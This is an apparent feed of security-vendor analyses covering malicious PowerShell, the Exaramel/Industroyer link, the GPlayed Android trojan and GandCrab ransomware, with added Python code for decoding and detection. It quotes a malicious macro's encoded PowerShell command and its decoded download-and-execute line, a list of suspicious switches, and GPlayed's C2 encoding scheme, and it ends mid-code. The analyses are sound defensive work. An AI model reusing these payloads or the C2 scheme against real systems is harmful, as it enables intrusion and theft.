Before digging into this next trend, please note that base64-encoded PowerShell is not an inherently malicious choice; it can be used for legitimate purposes, such as transferring binary files. However, encoding can be particularly helpful to an attacker because it allows obfuscation of the contents of malware that attackers may choose to deploy, thereby evading some malware detection mechanisms.

To begin, the presence of base64-encoded PowerShell scripts is often a telltale sign that malicious actors are using the framework. Legitimate users do not typically encode their scripts, but adversarial actors will often use encoding to obfuscate executable code that would otherwise get flagged by endpoint detection solutions.

For the past few months, X-Force IRIS has observed an increase in nested obfuscation when PowerShell is used maliciously. We have seen threat actors employ not only Base64-encoded scripts and commands, but also layers of obfuscation, sometimes including base64 encoding inside base64 encoding (double encoding) and then using Gzip compression, which adds an additional requirement to deflate. Other instances showed base64 encoding using a nonstandard alphabet to further obfuscate the script. These techniques make decoding harder for outsiders and raise a flag for defenders to further examine their intent.

In the following example, we provide information on a malicious Microsoft Excel document that contained Base64 obfuscation in order to evade detection, and how it was able to launch PowerShell to further its sinister endeavors.

Sample: 543D5E22DC9F8E57CA288E6C0EA281F3.xls

This is an Excel document containing multiple malicious Visual Basic for Applications (VBA) macros that provide instructions encoded in Base64. The delivery mechanism is a phishing email.

The file is opened in Microsoft Excel by the victim, and the program executes the malicious macros (some strings are purposely truncated).

WINWORD.EXE /n "C:\ 543D5E22DC9F8E57CA288E6C0EA281F3.xls "

Embedded macros execute PowerShell — let’s look at the script’s elements:

Base64-encoded command hidden in the Excel macro:

PowerShell.exe -Exec Bypass -NoL -Enc WwBuAGUAdAAuAHcAZQBiAHIAZQBxAHUAZQBzAHQAXQA6ADoAZABlAGYAYQB1AGwAdAB3AGUAYgBwAHIAbwB4AHkALgBjAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBuAGUAdAAuAGMAcgBlAGQAZQBuAHQAaQBhAGwAYwBhAGMAaABlAF0AOgA6AGQAZQBmAGEAdQBsAHQAYwByAGUAZABlAG4AdABpAGEAbABzADsAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGU…

The -Exec Bypass switch allows PowerShell to run with elevated privileges to bypass the execution policy. The -NoL (NoLogo) switch hides the PowerShell copyright banner at startup. The -Enc (Encoded Command) switch tells PowerShell to expect base64-encoded parameters for execution.

These instructions cause the victim’s machine to download a malicious PowerShell script over an HTTP connection, which could then be executed as shown in the example below.

The decoded strings:

[net.webrequest]::defaultwebproxy.credentials = [net.credentialcache]::defaultcredentials; [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; IEX (New-Object Net.WebClient).DownloadString('https://xxxxxx.xx.com/login-prompt.ps1')

PowerShell for Lateral Movement, Persistence and Injecting Malware

Fortunately, PowerShell use will not assist a malicious actor in all stages of an attack. Rather, it is primarily used to enable actions an attacker takes after initial compromise. Threat actors still need to use alternative tools for other stages of the attack, such as external reconnaissance, developing infrastructure, initial compromise and, often, to establish a foothold in the environment.

The recently launched “X-Force IRIS Cyberattack Preparation and Execution Frameworks” detail the steps most attackers take in identifying, researching, targeting and attacking a victim network.

Figure 2: X-Force IRIS Cyberattack Preparation and Execution Frameworks

Of the steps outlined above, X-Force IRIS has observed PowerShell used primarily to move laterally, establish a foothold, conduct reconnaissance and maintain persistence in attacks.

PowerShell provides many opportunities for lateral movement within a target environment. In addition, using its scripts maliciously can allow attackers to establish a foothold by installing backdoors and to maintain persistence by placing malware in scheduled tasks, or in fileless fashion, directly into memory. To that effect, X-Force IRIS recently observed that spear phishing email messages often provided the initial infection vector for attackers.

Traditional protection methods, such as physical security controls, anti-phishing software solutions, disabling macros and using banners to highlight messages coming from outside the company can assist in decreasing opportunities for attackers who rely on PowerShell to gain access to a networked device. Educating employees about the risks of opening file attachments and enabling macros in unsolicited emails can add another layer of security to reduce the chances of infection at the source.

Some Useful Tips for Defenders

With the accelerating use of PowerShell scripts, nested obfuscation and mechanisms to bypass application whitelisting, what can be done to mitigate risks? To keep enjoying the benefits of PowerShell and help lessen the risk of misuse, IRIS recommends logging, tracking and auditing PowerShell use in your networks and employing specific search tools to flag malicious behavior.

Below are some specific tips for logging and tracking potentially malicious PowerShell activity:

  • At a minimum, ensure that PowerShell v5 is installed on your system, which features enhanced logging capabilities, including script block logging capabilities. Favor the most recent version to ensure better security.
  • Turn on transcription logs to further enable PowerShell logs to capture a full command, even when it is obfuscated.
  • Monitor for typical commands that malicious actors often use to execute the PowerShell console, such as:
    • -ExecutionPolicy Bypass and its derivatives such as -Exec Bypass and -ep bypass;
    • -EncodedCommand and derivatives such as -enc;
    • -NonInteractive, -NoLogo and -NoProfile and their derivatives such as -NonI, -NoL, -nol and -NoP; and
    • -WindowStyle Hidden and its derivatives such as -w hidden, -window hidden and -win hidden.
  • Monitor for the following events:
    • Event ID 4688 — A new process has been created. In particular, when logging, aim to capture the command line parameters in 4688 events. This can assist in finding PowerShell commands being passed as arguments.
    • Event ID 7045 — A service was installed on the system.
    • Event ID 4697 — A service was installed on the system "Windows Event Logs View."
  • Employ YARA rules to assist in detecting malicious PowerShell use.
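The switch spellings listed above and the nested Base64/Gzip wrapping described under Trend 4 can be checked mechanically in process-creation and service-installation events. The Python below is an added example, not code from the X-Force IRIS post: it flags the listed switches in a 4688 command line (and in the binary path of a 7045/4697 service install, the Trend 1 pattern), decodes -EncodedCommand, and peels nested FromBase64String layers, gunzipping where needed; the three-layer sample it unwraps is constructed here and is not an observed payload.

```python
import base64
import gzip
import re
from typing import Dict, List, Optional

# Switch spellings the article lists, matched case-insensitively; PowerShell accepts
# any unambiguous prefix of a parameter name, hence the short forms.
SUSPICIOUS_SWITCHES = {
    "ExecutionPolicy Bypass": re.compile(r"-(?:executionpolicy|exec|ep)\s+bypass", re.I),
    "EncodedCommand": re.compile(r"-(?:encodedcommand|enc)\b", re.I),
    "NonInteractive": re.compile(r"-(?:noninteractive|noni)\b", re.I),
    "NoLogo": re.compile(r"-(?:nologo|nol)\b", re.I),
    "NoProfile": re.compile(r"-(?:noprofile|nop)\b", re.I),
    "WindowStyle Hidden": re.compile(r"-(?:windowstyle|window|win|w)\s+hidden", re.I),
}
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc)\s+([A-Za-z0-9+/=]+)", re.I)
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
GZIP_MAGIC = b"\x1f\x8b"


def flag_switches(cmdline: str) -> List[str]:
    """Names of the listed switches present in a 4688 process command line."""
    return [name for name, rx in SUSPICIOUS_SWITCHES.items() if rx.search(cmdline)]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries UTF-16LE text in Base64; return it, or None."""
    m = ENCODED_ARG.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _bytes_to_text(blob: bytes) -> str:
    # Embedded stages are Unicode (UTF-16LE) or ASCII/UTF-8; ASCII stored as
    # UTF-16LE has a NUL as every second byte.
    if len(blob) % 2 == 0 and blob[1:2] == b"\x00":
        return blob.decode("utf-16-le")
    return blob.decode("utf-8")


def unwrap_layers(script: str, max_depth: int = 8) -> List[str]:
    """Peel nested FromBase64String(...) literals, gunzipping when the decoded bytes
    carry the gzip magic, until none remains. Returns every layer, outermost first;
    the last entry is what would finally have executed."""
    layers = [script]
    for _ in range(max_depth):
        m = B64_LITERAL.search(layers[-1])
        if m is None:
            break
        try:
            blob = base64.b64decode(m.group(1), validate=True)
            if blob.startswith(GZIP_MAGIC):
                blob = gzip.decompress(blob)
            layers.append(_bytes_to_text(blob))
        except Exception:  # malformed or truncated layer: stop, report what we have
            break
    return layers


def triage(cmdline: str) -> Dict[str, object]:
    """One verdict per 4688 command line: switches, layer count, final script."""
    switches = flag_switches(cmdline)
    decoded = decode_encoded_command(cmdline)
    layers = unwrap_layers(decoded) if decoded is not None else []
    return {"switches": switches, "layers": len(layers),
            "final_script": layers[-1] if layers else None,
            "suspicious": bool(switches) or decoded is not None}


def flag_service_install(image_path: str) -> List[str]:
    """Same checks for the binary path of a 7045/4697 service install (Trend 1:
    a PowerShell script registered as a service, directly or through nssm)."""
    findings = flag_switches(image_path)
    if re.search(r"(?:^|\\)(?:powershell|nssm)\.exe\b", image_path, re.I):
        findings.insert(0, "service runs powershell.exe/nssm.exe")
    return findings


# --- constructed sample, not taken from the article: three nested layers ---
INNER = "Write-Output 'final stage would run here'"
_gz_b64 = base64.b64encode(gzip.compress(INNER.encode())).decode()
GZIP_STAGE = ("IEX (New-Object IO.StreamReader((New-Object IO.Compression.GzipStream("
              "(New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + _gz_b64
              + "'))),[IO.Compression.CompressionMode]::Decompress)))).ReadToEnd()")
_u16_b64 = base64.b64encode(GZIP_STAGE.encode("utf-16-le")).decode()
B64_STAGE = ("IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
             + _u16_b64 + "')))")
SAMPLE_CMDLINES = [
    "powershell.exe -Exec Bypass -NoL -w hidden -Enc "
    + base64.b64encode(B64_STAGE.encode("utf-16-le")).decode(),
    "powershell.exe -Command Get-Service",  # ordinary admin use: nothing flagged
]
SAMPLE_SERVICE = ('C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
                  '-command "& { . C:\\Scripts\\Monitor.ps1; Start-Monitoring }"')
```

Running `triage` over each line of SAMPLE_CMDLINES reports four flagged switches and three unwrapped layers for the first and nothing for the second; the same switch checks apply to service ImagePath values from 7045/4697 events.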

Specialized software and preventive measures can help provide an additional layer of protection and eliminate some of the manual process involved in logging PowerShell use and identifying potentially malicious scripts. These include:

Finally, in cases where attackers have already caused damage to a system or have facilitated the theft of information, forensic experts can assist in detecting malicious PowerShell scripts and eradicating them from an organization’s infrastructure. To restore security levels, it is important to detect and eliminate any malware or malicious processes that were injected using the PowerShell framework.

By increasing employee awareness and calibrating security controls to detect malicious PowerShell activity, organizations can enjoy better protection against threats and the evolving nature of threat actors active in the wild.

The post An Increase in PowerShell Attacks: Observations From IBM X-Force IRIS appeared first on Security Intelligence.

Security Affairs: Exaramel Malware Links Industroyer ICS malware and NotPetya wiper

ESET researchers have spotted a new strain of malware tracked as Exaramel that links the dreaded NotPetya wiper to the Industroyer ICS malware.

A few months ago, researchers from ESET discovered a new piece of malware that further demonstrates the existence of a link between Industroyer and the NotPetya wiper.

In June 2017, researchers at antivirus firm ESET discovered a new strain of malware, dubbed Industroyer, that was designed to target power grids.

Industroyer was involved in the December 2016 attack aimed at an electrical substation in Ukraine that caused significant power outages.

Industroyer is the fourth malware specifically designed to target ICS; the threats previously discovered by security experts are Stuxnet, BlackEnergy, and Havex.

Now experts found a link between the 2016 Industroyer attack and Russia-linked APT groups tracked as BlackEnergy, TeleBots, Sandworm, and Electrum.

“That said, we have observed and documented ties between the BlackEnergy attacks – not only those against the Ukrainian power grid but against various sectors and high-value targets – and a series of campaigns (mostly) against the Ukrainian financial sector by the TeleBots group.” reads the analysis published by ESET.

“In June 2017, when many large corporations worldwide were hit by the Diskcoder.C ransomware (aka Petya and NotPetya) – most probably as unintended collateral damage – we discovered that the outbreak started spreading from companies afflicted with a TeleBots backdoor, resulting from the compromise of the popular financial software M.E.Doc.”

Telebots Industroyer Exaramel

The NotPetya wiper was linked by experts to BlackEnergy and the KillDisk malware that was used in the 2015 attack in Ukraine.

In April 2018, ESET discovered a new backdoor tracked as Exaramel that definitively links Industroyer to TeleBots.

Researchers noticed that the configuration data in XML format, written by the Exaramel dropper into the Windows registry, includes the security solution in use on the compromised system, similar to Industroyer.

“the attackers are grouping their targets based on the security solutions in use. Similar behavior can be found in the Industroyer toolset – specifically some of the Industroyer backdoors were also disguised as an AV-related service (deployed under the name avtask.exe) and used the same grouping.” continues the analysis.

Experts also found many similarities in the code used for the implementation of the commands in the Exaramel malware and a backdoor from the Industroyer toolset.

Both pieces of malware rely on a report file for storing the output of executed shell commands and launched processes.

The main difference between the backdoor from the Industroyer toolset and the Exaramel backdoor is that the latter uses XML format for communication and configuration instead of a custom binary format.

“Along with the Exaramel backdoor, Telebots group uses some of their old tools, including a password stealer (internally referred as CredRaptor or PAI by the attackers) and a slightly-modified Mimikatz.” continues the analysis.

“The CredRaptor custom password-stealer tool, exclusively used by this group since 2016, has been slightly improved. Unlike previous versions, it collects saved passwords not only from browsers, but also from Outlook and many FTP clients.”

ESET observed only one attack based on Exaramel, which targeted an organization in Ukraine; the experts also discovered a Linux backdoor, tracked as Linux/Exaramel.A.

“The discovery of Exaramel shows that the TeleBots group is still active in 2018 and the attackers keep improving their tools and tactics.” concludes ESET.

“The strong code similarity between the Win32/Exaramel backdoor and the Industroyer main backdoor is the first publicly presented evidence linking Industroyer to TeleBots, and hence to NotPetya and BlackEnergy. While the possibility of false flags – or a coincidental code sharing by another threat actor – should always be kept in mind when attempting attribution, in this case we consider it unlikely.”

Pierluigi Paganini

(Security Affairs – instant messaging, hacking)
The post Exaramel Malware Links Industroyer ICS malware and NotPetya wiper appeared first on Security Affairs.

Researchers link Industroyer to NotPetya

ESET researchers believe they have found evidence that the TeleBots APT was behind the December 2016 attacks against the Ukraine energy sector that resulted in blackouts throughout the country: a backdoor dubbed Exaramel.

The missing evidence

With APT groups and the malware they deploy getting named differently by the various AV vendors, it’s sometimes difficult to follow the connections. This diagram shared by the researchers can help:

The post Researchers link Industroyer to NotPetya appeared first on Help Net Security.

GPlayed Trojan – .Net playing with Google Market

This blog post is authored by Vitor Ventura.

Introduction

In a world where everything is always connected, and mobile devices are involved in individuals' day-to-day lives more and more often, malicious actors are seeing increased opportunities to attack these devices. Cisco Talos has identified the latest attempt to penetrate mobile devices — a new Android trojan that we have dubbed "GPlayed." This is a trojan with many built-in capabilities. At the same time, it's extremely flexible, making it a very effective tool for malicious actors. The sample we analyzed uses an icon very similar to Google Apps, with the label "Google Play Marketplace" to disguise itself.

The malicious application is on the left-hand side.

What makes this malware extremely powerful is the capability to adapt after it's deployed. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed. Our analysis indicates that this trojan is in its testing stage but given its potential, every mobile user should be aware of GPlayed. Mobile developers have recently begun eschewing traditional app stores and instead want to deliver their software directly through their own means. But GPlayed is an example of where this can go wrong, especially if a mobile user is not aware of how to distinguish a fake app versus a real one.

Trojan architecture and capabilities

This malware is written in .NET using the Xamarin environment for mobile applications. The main DLL is called "Reznov.DLL." This DLL contains one root class called "eClient," which is the core of the trojan. The imports reveal the use of a second DLL called "eCommon.dll." We determined that the "eCommon" file contains support code and structures that are platform independent. The main DLL also contains eClient subclasses that implement some of the native capabilities.

The package certificate is issued under the package name, which also resembles the name of the main DLL.

Certificate information

The Android package is named "verReznov.Coampany." The application uses the label "Installer" and its name is "android.app.Application."

Package permissions

The trojan declares numerous permissions in the manifest, from which we should highlight the BIND_DEVICE_ADMIN, which provides nearly full control of the device to the trojan.

This trojan is highly evolved in its design. It has a modular architecture implemented in the form of plugins, and it can also receive new .NET source code, which is compiled on the device at runtime.

Initialization of the compiler object

The plugins can be added in runtime, or they can be added as a package resource at packaging time. This means that the authors or the operators can add capabilities without the need to recompile and upgrade the trojan package on the device.

Trojan native capabilities

This is a full-fledged trojan with capabilities ranging from those of a banking trojan to a full spying trojan. This means that the malware can do anything from harvesting the user's banking credentials to monitoring the device's location. There are several indicators (see the "Trojan activity" section below) that it is in its last stages of development, but it has the potential to be a serious threat.

Trojan details

Upon boot, the trojan will start by populating a shared preferences file with the configuration it has on its internal structures. Afterward, it will start several timers to execute different tasks. The first timer will be fired on the configured interval (20 seconds in this case), pinging the command and control (C2) server. The response can either be a simple "OK," or can be a request to perform some action on the device. The second timer will run every five seconds and it will try to enable the WiFi if it's disabled. The third timer will fire every 10 seconds and will attempt to register the device into the C2 and register wake-up locks on the system to control the device's status.

During the trojan registration stage, the trojan exfiltrates private information such as the phone's model, IMEI, phone number and country. It will also report the version of Android that the phone is running and any additional capabilities.

Device registration

This is the last of the three main timers that are created. The trojan will register the SMS handler, which will forward the contents and the sender of all of the SMS messages on the phone to the C2.

The final step in the trojan's initialization is the escalation and maintenance of privileges in the device. This is done both by requesting admin privileges on the device and asking the user to allow the application to access the device's settings.

Privilege escalation requests

The screens asking for the user's approval won't close unless the user approves the privilege escalation. If the user closes the windows, they will appear again due to the timer configuration.

After the installation of the trojan, it will wait randomly between three and five minutes to activate one of the native capabilities — these are implemented on the eClient subclass called "GoogleCC." This class will open a WebView with a Google-themed page asking for payment in order to use the Google services. This will take the user through several steps until it collects all the necessary credit card information, which will be checked online and exfiltrated to the C2. During this process, an amount of money, configured by the malicious operator, is requested to the user.

Steps to request the user's credit card information

In our sample configuration, the request for the views above cannot be canceled or removed from the screen — behaving just like a screen lock that won't be disabled without providing credit card information.

All communication with the C2 is done over HTTP. It will use either a standard web request or it will write data into a web socket if the first method fails. The C2 can also use WebSocket as a backup communication channel.

Before sending any data to the C2, the trojan attempts to disguise it: the data is serialized as JSON, which is then encoded in Base64. The trojan then replaces '=' with 'AAAZZZXXX', '+' with '|' and '/' with '.' to disguise the Base64.

Request encoding process

The HTTP requests follow the format below, while on the WebSocket only the query data is written.

<server path>?q=<IMEI>-<REQUEST CODE>:<Obfuscated Base64 encoded data>
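The encoding scheme and request format just described, as an added example written for traffic analysis rather than taken from the trojan: it applies and reverses the '=', '+' and '/' substitutions and splits a captured request into its IMEI, response code and JSON payload. The C2 path, IMEI and registration fields are placeholders constructed here, not indicators from the post.

```python
import base64
import json
from typing import Any, Dict

# Substitutions the post describes GPlayed applying to standard Base64 output
# before the data is placed in the query string.
SUBSTITUTIONS = [("=", "AAAZZZXXX"), ("+", "|"), ("/", ".")]


def obfuscate(payload: Any) -> str:
    """JSON-serialize, Base64-encode, then apply the trojan's substitutions."""
    raw = json.dumps(payload, separators=(",", ":")).encode()
    encoded = base64.b64encode(raw).decode()
    for plain, replacement in SUBSTITUTIONS:
        encoded = encoded.replace(plain, replacement)
    return encoded


def deobfuscate(blob: str) -> Any:
    """Reverse the substitutions, then Base64-decode and parse the JSON."""
    for plain, replacement in SUBSTITUTIONS:
        blob = blob.replace(replacement, plain)
    return json.loads(base64.b64decode(blob, validate=True))


def build_request(server_path: str, imei: str, code: str, payload: Any) -> str:
    """<server path>?q=<IMEI>-<REQUEST CODE>:<obfuscated data>, as in the post."""
    return f"{server_path}?q={imei}-{code}:{obfuscate(payload)}"


def parse_request(url: str) -> Dict[str, Any]:
    """Split a captured request (or the bare WebSocket query) back into fields."""
    path, sep, query = url.partition("?q=")
    if not sep:  # WebSocket channel carries only the query data
        path, query = "", url
    header, _, blob = query.partition(":")
    imei, _, code = header.partition("-")
    return {"path": path, "imei": imei, "code": code, "data": deobfuscate(blob)}


# Constructed sample: placeholder C2 path, IMEI and registration data.
SAMPLE_PAYLOAD = {"model": "Pixel", "country": "RU", "android": "8.1", "caps": ["sms", "cc"]}
SAMPLE_REQUEST = build_request("http://c2.example.invalid/ws", "123456789012345",
                               "Registration", SAMPLE_PAYLOAD)
```

Decoding a captured query this way recovers the plaintext JSON the device reported; the same routine works on the bare query written to the WebSocket channel.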

As is common with trojans, the communication is always initiated by the trojan on the device to the C2. The request codes are actually replies to the C2 action requests, which are actually called "responses." There are 27 response codes that the C2 can use to make requests to the trojan, which pretty much match what's listed in the capabilities section.

  • Error
  • Registration
  • Ok
  • Empty
  • SendSMS
  • RequestGoogleCC
  • Wipe
  • OpenBrowser
  • SendUSSD
  • RequestSMSList
  • RequestAppList
  • RequestLocation
  • ShowNotification
  • SetLockPassword
  • LockNow
  • MuteSound
  • LoadScript
  • LoadPlugin
  • ServerChange
  • StartApp
  • CallPhone
  • SetPingTimer
  • SMSBroadcast
  • RequestContacts
  • AddInject
  • RemoveInject
  • Evaluate

Another feature of this trojan is the ability to register injects, which are JavaScript snippets of code. These will be executed in a WebView object created by the trojan. This gives the operators the capability to trick the user into accessing any site while stealing the user's cookies or forging form fields, like account numbers or phone numbers.

Trojan activity

At the time of the writing of this post, all URLs (see IOC section) found on the sample were inactive, and it does not seem to be widespread. There are some indicators that this sample is just a test sample on its final stages of development. There are several strings and labels still mentioning 'test' or 'testcc' — even the URL used for the credit card data exfiltration is named "testcc.php."

Debug information on logcat

Another indicator is the amount of debugging information the trojan is still generating — a production-level trojan would keep its logging to a minimum.

The only sample was found on public repositories and almost seemed to indicate a test run to determine the detection ratio of the sample. We have observed this trojan being submitted to public antivirus testing platforms, once as a package and once for each DLL to determine the detection ratio. The sample analyzed was targeted at Russian-speaking users, as most of the user interaction pages are written in Russian. However, given the way the trojan is built, it is highly customizable, meaning that adapting it to a different language would be extremely easy. The wide range of capabilities doesn't limit this trojan to a specific malicious activity like a banking trojan or a ransomware. This makes it impossible to create a target profile.

Conclusion

This trojan shows a new path for threats to evolve. The ability to move code from desktop to mobile platforms with no effort, as eCommon.DLL demonstrates, means that malicious actors can create hybrid threats faster and with fewer resources than ever before. This trojan's design and implementation is of an uncommonly high level, making it a dangerous threat. These kinds of threats will become more common, as more and more companies decide to publish their software directly to consumers.

There have been several recent examples of companies choosing to release their software directly to consumers, bypassing traditional storefronts. The average user might not have the necessary skills to distinguish legitimate sites from malicious ones. We've seen that this has been the case for many years with spear-phishing campaigns on desktop and mobile platforms, so, unfortunately, it doesn't seem that this will change any time soon. And this just means attackers will continue to be successful.

Coverage

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of compromise (IOC)

URLs
hxxp://5.9.33.226:5416
hxxp://172.110.10.171:85/testcc.php
hxxp://sub1.tdsworker.ru:5555/3ds/

Hash values
Package.apk - A342a16082ea53d101f556b50532651cd3e3fdc7d9e0be3aa136680ad9c6a69f
eCommon.dll - 604deb75eedf439766896f05799752de268baf437bf89a7185540627ab4a4bd1
Reznov.dll - 17b8665cdbbb94482ca970a754d11d6e29c46af6390a2d8e8193d8d6a527dec3

Custom activity prefix
com.cact.CAct

Top cybersecurity facts, figures and statistics for 2018

Looking for hard numbers to back up your sense of what’s happening in the cybersecurity world? We dug into studies and surveys of the industry’s landscape to get a sense

The post Top cybersecurity facts, figures and statistics for 2018 appeared first on The Cyber Security Place.

McAfee Blogs: Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation

The GandCrab ransomware, which first appeared in January, has been updated rapidly during its short life, with Version 5.0.2 appearing this month. In this post we will examine the latest version and how the authors have improved the code (and in some cases have made mistakes). McAfee gateway and endpoint products are able to protect customers from known variants of this threat.

The GandCrab authors have moved quickly to improve the code and have added comments to provoke the security community, law enforcement agencies, and the NoMoreRansom organization. Despite the agile approach of the developers, the coding is not professional and bugs usually remain in the malware (even in Version 5.0.2), but the speed of change is impressive and increases the difficulty of combating it.

The group behind GandCrab has achieved cult status in underground forums; the authors are undoubtedly confident and have strong marketing skills, but flawless programming is not one of their strengths.

Underground alliances

On September 27, the GandCrab crew announced Version 5 with the same showmanship as its earlier versions. GandCrab ransomware has gained a lot of attention from security researchers as well as the underground. The developers market the affiliate program like a “members-only club” and new affiliates are lining up to join, in the hope of making easy money through the large-scale ransomware extortion scheme.

The prospect of making money not only attracts new affiliates, but also leads to the formation of new alliances between GandCrab and other criminal services that strengthen the malware’s supply and distribution networks. One of these alliances became obvious during Version 4, in which the ransomware started being distributed through the new Fallout exploit kit. This alliance was again emphasized in the GandCrab Version 5 announcement, as the GandCrab crew openly endorsed FalloutEK.

The GandCrab Version 5 announcement.

With Version 5, yet another alliance with a criminal service has been formed. The malware crypter service NTCrypt announced that it is partnering with the GandCrab crew. A crypter service provides malware obfuscation to evade antimalware security products.

The NTCrypt-GandCrab partnership announcement offering a special price for GandCrab users.

The partnership between GandCrab and NTCrypt was established in a novel way. At the end of September, the GandCrab crew started a “crypt competition” on a popular underground forum to find a new crypter service they could partner with. NTCrypt applied and eventually won the competition.

The “crypt competition” announcement.

This novel approach emphasizes once more the cult status GandCrab has in the underground community. For a criminal business such as GandCrab, building these alliances makes perfect sense: They increase the ease of operation and a trusted affiliate network minimizes their risk exposure by allowing them to avoid less-trusted suppliers and distributors.

For the security community it is worrisome to see that GandCrab’s aggressive marketing strategy seems to be paying off. It is generating a strong influx of criminal interest and allows the GandCrab crew to form alliances with other essential services in the cybercriminal supply chain.

GandCrab overview

GandCrab Version 5 uses several mechanisms to infect systems. The following diagram shows an overview of GandCrab’s behavior.

GandCrab Version 5 Infection

Entry vector

GandCrab uses several entry vectors:

  • Remote desktop connections with weak security or bought in underground forums
  • Phishing emails with links or attachments
  • Trojanized legitimate programs containing the malware, or downloading and launching it
  • Exploit kits such as RigEK and FalloutEK
  • PowerShell scripts, or code run directly inside the memory of the PowerShell process (the latter mainly in Version 5.0.2)
  • Botnets such as Phorpiex (an old botnet that spread not only this malware but many others)

The goal of GandCrab, as with other ransomware, is to encrypt all or many files on an infected system and demand payment to unlock them. The developers require payment in cryptocurrency, primarily Dash (Bitcoin in some older versions), because it is hard to trace and payments settle quickly.

The malware is usually, but not always, packed. We have seen variants in .exe format (the primary form) along with DLLs. GandCrab is effectively ransomware as a service; its operators can choose which version they want.

Version 5.0

This version has two releases. The first runs only on Windows 7 or later because of a mistake made at compile time (explained below). Version 5.0 carries two exploits that try to elevate privileges. It checks the operating system version and the TokenIntegrityLevel class of its own process; if the SID subauthority is SECURITY_MANDATORY_LOW_RID (0x1000) and an earlier mutex check has also passed, it tries to run the exploits.

The first is the exploit released in August on Twitter and GitHub by the researcher “SandboxEscaper” (Twitter handle: https://twitter.com/sandboxescaper).

This exploit abuses a flaw in the Windows Task Scheduler, which improperly handles Advanced Local Procedure Call (ALPC) requests.

The GandCrab authors claim there is no CVE for this exploit, but that is incorrect: it is CVE-2018-8440, which affects Windows 7 through Windows 10 and the corresponding Windows Server releases. Microsoft’s advisory for CVE-2018-8440 has more detail.

In the first release of Version 5.0, the authors implemented the exploit with ordinary, statically resolved calls, so at compile time the import address table (IAT) was populated with the DLL those calls need. That DLL does not exist on Windows Vista or XP, so on those systems the loader fails and the malware shows an error instead of running.

Import of xpsprint.dll that will not run on Windows XP or Vista.

The exploit using direct calls.

This release dropped an HTML ransom note after encrypting the user’s files, but the note was faulty: it did not always contain the information needed to decrypt the files.

The second release resolves the functions dynamically and obfuscates the exploit’s strings, as shown in the following image. (Earlier they were in plain text.)

The exploit with dynamic calls and obfuscated strings.

The second exploit targets CVE-2018-8120, a kernel elevation-of-privilege flaw in Windows 7, Windows Server 2008 and Windows Server 2008 R2. The exploit replaces the malware process’s token with that of the System process, so the malware continues running with System privileges.

Executing the exploit CVE-2018-8120.

You can read more about this exploit on mcafee.com.

Before using the exploits, the malware checks the operating system version, the type of user, and whether it can read the integrity level of its own token. In some cases it fails to infect: on Windows XP, for example, the second release of Version 5 runs but does not encrypt any files. (We thank fellow researcher Yassine Lemmou, who shared this information with us.)

We and Lemmou know where the problem is in Version 5.0.2. A few changes to the registry could make the malware run correctly, but we do not want to help the malware authors fix their product. Even though GandCrab’s authors quickly repair mistakes as they are pointed out, they still fail to find some of the basic errors by themselves. (McAfee has had no contact with GandCrab’s developers.)

The second release appends a random five-letter extension instead of the .CRAB or .KRAB extension seen in previous versions. The malware stores this extension as binary data in a new registry subkey, “ext_data\data”, under the value name “ext.”

A new registry entry to hold the random extension.

The malware tries creating this new entry in the root key of HKEY_LOCAL_MACHINE. If it cannot—for example, because the user does not have admin rights—it places the entry in the root key HKEY_CURRENT_USER. This entry is deleted in some samples after the files have been encrypted.

Version 5.0.1

This version fixed some internal bugs in the malware but made no other notable changes.

Version 5.0.2

This version changes the random extension length from 5 to 10 characters and fixes some internal bugs. Other bugs remain, however, meaning files cannot always be encrypted.

The latest

This section is based on the latest version of the malware (Version 5.0.2, seen on October 4), though some elements appear in earlier releases of Version 5. Since Version 5, the malware uses two exploits to try to elevate privileges on the system.

Before choosing an exploit, the malware makes a dynamically resolved call to IsWow64Process to determine whether it is a 32-bit process running under WOW64 on 64-bit Windows or on a native 32-bit system.

The dynamic call to IsWow64Process with obfuscated strings.

Depending on the result, the malware selects one of two embedded DLLs (one per architecture), each encrypted with a simple single-byte XOR using the key 0x18.

Decrypting the DLL to load with the exploit and fix the header.

The authors use a simple trick to hinder detection and carving of the embedded payload: the first two bytes of the DLL (the MZ signature) are deliberately trashed and restored only after decryption, as the preceding image shows.
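The recovery step an analyst would script for this, as an added example that is not McAfee’s code: undo the XOR with key 0x18, write the MZ signature back over the two trashed bytes, and only then trust the result, by checking that e_lfanew points at a real “PE\0\0” signature before classifying the image. The XOR key and the trashed-header behaviour are from the analysis above; the minimal PE image used as input here is constructed for the example and is not a GandCrab sample.

```python
"""Recover an embedded PE payload that was XOR-encoded with the single-byte
key 0x18 and whose first two bytes were deliberately trashed (added example;
the sample image is constructed, not real malware)."""
import struct

XOR_KEY = 0x18            # key reported in the analysis
IMAGE_FILE_DLL = 0x2000   # PE Characteristics flag
MACHINES = {0x14C: "x86", 0x8664: "x64"}


def xor_decrypt(blob: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR is its own inverse, so this both encodes and decodes."""
    return bytes(b ^ key for b in blob)


def repair_pe_header(data: bytes) -> bytes:
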